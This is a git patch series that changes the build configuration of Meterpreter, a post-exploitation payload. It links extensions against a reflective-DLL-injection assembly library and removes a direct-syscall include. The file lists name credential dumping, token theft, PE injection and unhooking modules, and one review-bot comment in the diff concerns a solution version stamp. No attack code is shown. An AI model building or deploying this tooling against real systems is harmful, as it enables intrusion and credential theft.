@@ -170,6 +170,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -243,6 +244,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -316,6 +318,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -389,6 +392,7 @@ msbuild.exe /target:Build /property:PlatformToolset=$(PlatformToolset);Configura $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -461,6 +465,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -533,6 +538,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -603,8 +609,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_python/CMakeLists.txt b/c/meterpreter/workspace/ext_server_python/CMakeLists.txt index ed6f16b36..8a6de2107 100644 --- a/c/meterpreter/workspace/ext_server_python/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_python/CMakeLists.txt @@ -55,7 +55,7 @@ set(LINK_LIBS ${LIBRESSL_LIB_DIR}/tls-20.lib ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj index 6929a8b7c..a29adbdd6 100755 
--- a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj +++ b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj @@ -152,6 +152,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -210,6 +211,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -267,6 +269,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -324,6 +327,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -382,6 +386,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -439,6 +444,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -811,9 +817,19 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" true true + + true + true + true + + + true + true + true + - + \ No newline at end of file 
diff --git a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters index e9ab9a205..ab90e5c43 100755 --- a/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters +++ b/c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters @@ -1043,6 +1043,7 @@ Modules + @@ -1058,5 +1059,7 @@ Modules\_ctypes + + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt b/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt index 366cf1039..6f4408066 100644 --- a/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_sniffer/CMakeLists.txt @@ -38,7 +38,7 @@ if(IS_X64) endif() set(LINK_LIBS ${PSSDK_LIB_DIR}/pssdk_vc${PSSDK_VER}_mt.lib ws2_32) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj b/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj index 8473e05af..9993531bf 100644 --- a/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj +++ b/c/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcxproj @@ -140,6 +140,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -273,6 +275,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true 
@@ -339,6 +342,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) false + No true @@ -360,6 +364,16 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) + + + true + true + + + true + true + + @@ -367,4 +381,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt index 813117b2d..838f53c8c 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt @@ -58,7 +58,7 @@ if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) # Post processing (required for all Meterpreter DLLs) editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM}) diff --git a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj index 8256f7229..26e85ed1d 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj +++ b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj @@ -171,6 +171,7 @@ /ignore:4070 %(AdditionalOptions) false + No true @@ -239,6 +240,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" false + No true @@ -306,6 +308,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) /ignore:4070 %(AdditionalOptions) false + No true @@ -372,6 +375,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) false + No true @@ -439,6 +443,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" false + No true 
@@ -505,6 +510,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) /ignore:4070 %(AdditionalOptions) false + No true @@ -593,6 +599,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -600,4 +618,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt b/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt index 0f1b5e349..441903957 100644 --- a/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_unhook/CMakeLists.txt @@ -27,7 +27,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj b/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj index 085a3deb0..7b3cceace 100644 --- a/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj +++ b/c/meterpreter/workspace/ext_server_unhook/ext_server_unhook.vcxproj @@ -152,6 +152,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -315,6 +318,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -370,6 +374,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -424,6 +429,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -442,6 +448,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + @@ -449,4 +467,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt b/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt index 99c8eaa32..44401059a 100644 --- a/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_winpmem/CMakeLists.txt @@ -43,7 +43,7 @@ set(LINK_LIBS ws2_32 ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() 
diff --git a/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj b/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj index 77709c765..03ac0a384 100644 --- a/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj +++ b/c/meterpreter/workspace/ext_server_winpmem/ext_server_winpmem.vcxproj @@ -151,6 +151,7 @@ $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -205,6 +206,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -258,6 +260,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -312,6 +315,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -367,6 +371,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -421,6 +426,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\extension.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL 
@@ -446,8 +452,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" false + + + true + true + true + + + true + true + true + + - + \ No newline at end of file diff --git a/c/meterpreter/workspace/meterpreter.sln b/c/meterpreter/workspace/meterpreter.sln index 453025ea6..df9f541d6 100644 --- a/c/meterpreter/workspace/meterpreter.sln +++ b/c/meterpreter/workspace/meterpreter.sln @@ -1,7 +1,7 @@  Microsoft Visual Studio Solution File, Format Version 12.00 -# Visual Studio Version 17 -VisualStudioVersion = 17.0.32112.339 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.33801.447 MinimumVisualStudioVersion = 10.0.40219.1 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_priv", "ext_server_priv\ext_server_priv.vcxproj", "{87C64204-C82F-415D-AF45-D0B33BDFE39A}" EndProject diff --git a/c/meterpreter/workspace/metsrv/CMakeLists.txt b/c/meterpreter/workspace/metsrv/CMakeLists.txt index 0cf47cde8..c75dc8b11 100644 --- a/c/meterpreter/workspace/metsrv/CMakeLists.txt +++ b/c/meterpreter/workspace/metsrv/CMakeLists.txt @@ -38,7 +38,7 @@ else() set(LINK_LIBS ${LINK_LIBS} ws2_32) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) # Post processing (required for all Meterpreter DLLs) editbin(${PROJECT_NAME} ${BIN_SUBSYSTEM}) diff --git a/c/meterpreter/workspace/metsrv/metsrv.vcxproj b/c/meterpreter/workspace/metsrv/metsrv.vcxproj index e307b3993..f08b1b983 100644 --- a/c/meterpreter/workspace/metsrv/metsrv.vcxproj +++ b/c/meterpreter/workspace/metsrv/metsrv.vcxproj @@ -174,6 +174,7 @@ Windows /ignore:4070 %(AdditionalOptions) + No true @@ -246,6 +247,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No true @@ -316,6 +318,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) Windows /ignore:4070 %(AdditionalOptions) + No true 
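Review bot: The meterpreter.sln hunk rewrites the header from `# Visual Studio Version 17` / `VisualStudioVersion = 17.0.32112.339` to `# Visual Studio Version 16` / `VisualStudioVersion = 16.0.33801.447`, which reads as an IDE save from a different workstation rather than an intended part of this change; nothing else on this page refers to the solution version. Unless the downgrade is deliberate, those two lines should be dropped from the commit so the solution keeps the newer version stamp, and if it is deliberate the commit message should say why.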
@@ -338,7 +341,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - MinSpace + Custom OnlyExplicitInline Size ..\..\source\ReflectiveDLLInjection\common;..\..\source\server;..\..\source\common;%(AdditionalIncludeDirectories) @@ -359,6 +362,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" true true true + true NDEBUG;%(PreprocessorDefinitions) @@ -384,6 +388,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" Windows /ignore:4070 %(AdditionalOptions) + No true @@ -453,6 +458,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No true @@ -521,6 +527,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) Windows /ignore:4070 %(AdditionalOptions) + No true @@ -590,6 +597,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + diff --git a/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters b/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters index 5a497eff9..31fe6945c 100644 --- a/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters +++ b/c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters @@ -55,4 +55,8 @@ + + + + \ No newline at end of file diff --git a/c/meterpreter/workspace/screenshot/CMakeLists.txt b/c/meterpreter/workspace/screenshot/CMakeLists.txt index fbecb862f..da3ffcc44 100644 --- a/c/meterpreter/workspace/screenshot/CMakeLists.txt +++ b/c/meterpreter/workspace/screenshot/CMakeLists.txt @@ -25,7 +25,7 @@ set_target_properties(${PROJECT_NAME} PROPERTIES LINK_FLAGS "/DEF:\"${MOD_DEF_DI set_source_files_properties(${MOD_DEF_DIR}/plugin.def PROPERTIES HEADER_FILE_ONLY TRUE) set(LINK_LIBS jpeg) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() 
diff --git a/c/meterpreter/workspace/screenshot/screenshot.vcxproj b/c/meterpreter/workspace/screenshot/screenshot.vcxproj index b6f2b02e1..3186ca82a 100644 --- a/c/meterpreter/workspace/screenshot/screenshot.vcxproj +++ b/c/meterpreter/workspace/screenshot/screenshot.vcxproj @@ -149,6 +149,7 @@ $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -196,6 +197,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -242,6 +244,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -290,6 +293,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -340,6 +344,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -388,6 +393,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) $(ProjectDir)..\..\source\def\plugin.def /ignore:4070 %(AdditionalOptions) + No editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -403,6 +409,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + + + true + true + true + + + true + true + true + + 
@@ -410,4 +428,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" - + \ No newline at end of file From a5e33d167d4a71d82df3d13e37fea3f113728d2a Mon Sep 17 00:00:00 2001 
From: Christophe De La Fuente Date: Wed, 10 Jan 2024 14:42:45 +0100 Subject: [PATCH 10/14] Remove include DirectSyscall.c --- c/meterpreter/source/ReflectiveDLLInjection | 2 +- c/meterpreter/source/common/common_command_ids.h | 0 c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c | 0 c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h | 0 c/meterpreter/source/dump_sam/dump_sam.c | 1 - c/meterpreter/source/dump_sam/dump_sam.def | 0 c/meterpreter/source/elevator/elevator.c | 1 - c/meterpreter/source/extensions/bofloader/bofloader.c | 1 - c/meterpreter/source/extensions/espia/espia.c | 1 - c/meterpreter/source/extensions/extapi/extapi.c | 1 - c/meterpreter/source/extensions/extapi/ntds.c | 0 c/meterpreter/source/extensions/incognito/incognito.c | 1 - c/meterpreter/source/extensions/kiwi/main.c | 1 - c/meterpreter/source/extensions/lanattacks/lanattacks.c | 1 - c/meterpreter/source/extensions/peinjector/headers.h | 0 c/meterpreter/source/extensions/peinjector/libpefile.c | 0 c/meterpreter/source/extensions/peinjector/libpefile.h | 0 c/meterpreter/source/extensions/peinjector/libpeinfect.c | 0 c/meterpreter/source/extensions/peinjector/libpeinfect.h | 0 .../source/extensions/peinjector/libpeinfect_obfuscator.c | 0 .../source/extensions/peinjector/libpeinfect_obfuscator.h | 0 c/meterpreter/source/extensions/peinjector/libpetool.c | 0 c/meterpreter/source/extensions/peinjector/libpetool.h | 0 c/meterpreter/source/extensions/peinjector/peinjector.c | 1 - c/meterpreter/source/extensions/peinjector/peinjector.h | 0 c/meterpreter/source/extensions/peinjector/peinjector_bridge.c | 0 c/meterpreter/source/extensions/peinjector/peinjector_bridge.h | 0 c/meterpreter/source/extensions/powershell/powershell.c | 1 - c/meterpreter/source/extensions/powershell/powershell.h | 0 .../source/extensions/powershell/powershell_bindings.cpp | 0 .../source/extensions/powershell/powershell_bindings.h | 0 .../source/extensions/powershell/powershell_bridge.cpp | 0 
c/meterpreter/source/extensions/powershell/powershell_bridge.h | 0 c/meterpreter/source/extensions/priv/elevate.c | 0 c/meterpreter/source/extensions/priv/elevate.h | 0 c/meterpreter/source/extensions/priv/namedpipe_efs.c | 0 c/meterpreter/source/extensions/priv/priv.c | 1 - c/meterpreter/source/extensions/priv/priv.rc | 0 c/meterpreter/source/extensions/priv/resource.h | 0 c/meterpreter/source/extensions/python/python_commands.c | 0 c/meterpreter/source/extensions/python/python_commands.h | 0 c/meterpreter/source/extensions/python/python_main.c | 1 - .../source/extensions/python/python_meterpreter_binding.c | 0 c/meterpreter/source/extensions/sniffer/sniffer.c | 1 - c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c | 0 c/meterpreter/source/extensions/stdapi/server/stdapi.c | 1 - c/meterpreter/source/extensions/stdapi/stdapi.h | 0 c/meterpreter/source/extensions/unhook/unhook.c | 1 - c/meterpreter/source/extensions/winpmem/winpmem.cpp | 0 c/meterpreter/source/extensions/winpmem/winpmem.h | 0 c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp | 1 - c/meterpreter/source/metsrv/metsrv.c | 1 - c/meterpreter/source/metsrv/metsrv.h | 0 c/meterpreter/source/metsrv/server_pivot_named_pipe.c | 0 c/meterpreter/source/screenshot/screenshot.c | 1 - 55 files changed, 1 insertion(+), 19 deletions(-) mode change 100755 => 100644 c/meterpreter/source/common/common_command_ids.h mode change 100755 => 100644 c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.c mode change 100755 => 100644 c/meterpreter/source/dump_sam/ReflectiveFreeAndExitThread.h mode change 100755 => 100644 c/meterpreter/source/dump_sam/dump_sam.c mode change 100755 => 100644 c/meterpreter/source/dump_sam/dump_sam.def mode change 100755 => 100644 c/meterpreter/source/elevator/elevator.c mode change 100755 => 100644 c/meterpreter/source/extensions/bofloader/bofloader.c mode change 100755 => 100644 c/meterpreter/source/extensions/espia/espia.c mode change 100755 => 100644 
c/meterpreter/source/extensions/extapi/extapi.c mode change 100755 => 100644 c/meterpreter/source/extensions/extapi/ntds.c mode change 100755 => 100644 c/meterpreter/source/extensions/incognito/incognito.c mode change 100755 => 100644 c/meterpreter/source/extensions/lanattacks/lanattacks.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/headers.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpefile.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpefile.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpeinfect.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpeinfect.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpeinfect_obfuscator.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpetool.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/libpetool.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/peinjector.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/peinjector.h mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/peinjector_bridge.c mode change 100755 => 100644 c/meterpreter/source/extensions/peinjector/peinjector_bridge.h mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell.c mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell.h mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell_bindings.cpp mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell_bindings.h mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell_bridge.cpp mode change 100755 => 100644 c/meterpreter/source/extensions/powershell/powershell_bridge.h mode change 100755 => 
100644 c/meterpreter/source/extensions/priv/elevate.c mode change 100755 => 100644 c/meterpreter/source/extensions/priv/elevate.h mode change 100755 => 100644 c/meterpreter/source/extensions/priv/namedpipe_efs.c mode change 100755 => 100644 c/meterpreter/source/extensions/priv/priv.c mode change 100755 => 100644 c/meterpreter/source/extensions/priv/priv.rc mode change 100755 => 100644 c/meterpreter/source/extensions/priv/resource.h mode change 100755 => 100644 c/meterpreter/source/extensions/python/python_commands.c mode change 100755 => 100644 c/meterpreter/source/extensions/python/python_commands.h mode change 100755 => 100644 c/meterpreter/source/extensions/python/python_main.c mode change 100755 => 100644 c/meterpreter/source/extensions/python/python_meterpreter_binding.c mode change 100755 => 100644 c/meterpreter/source/extensions/sniffer/sniffer.c mode change 100755 => 100644 c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c mode change 100755 => 100644 c/meterpreter/source/extensions/stdapi/stdapi.h mode change 100755 => 100644 c/meterpreter/source/extensions/unhook/unhook.c mode change 100755 => 100644 c/meterpreter/source/extensions/winpmem/winpmem.cpp mode change 100755 => 100644 c/meterpreter/source/extensions/winpmem/winpmem.h mode change 100755 => 100644 c/meterpreter/source/extensions/winpmem/winpmem_meterpreter.cpp mode change 100755 => 100644 c/meterpreter/source/metsrv/metsrv.c mode change 100755 => 100644 c/meterpreter/source/metsrv/metsrv.h mode change 100755 => 100644 c/meterpreter/source/metsrv/server_pivot_named_pipe.c mode change 100755 => 100644 c/meterpreter/source/screenshot/screenshot.c diff --git a/c/meterpreter/source/ReflectiveDLLInjection b/c/meterpreter/source/ReflectiveDLLInjection index 77be38083..920db0b6c 160000 --- a/c/meterpreter/source/ReflectiveDLLInjection +++ b/c/meterpreter/source/ReflectiveDLLInjection 
